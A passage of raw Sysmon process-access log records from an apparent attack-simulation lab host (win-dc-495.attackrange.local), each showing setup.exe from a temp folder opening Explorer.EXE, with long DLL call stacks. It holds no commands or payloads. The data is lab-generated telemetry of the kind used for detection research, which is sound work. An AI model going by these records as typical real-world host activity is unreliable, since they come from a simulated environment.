13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.s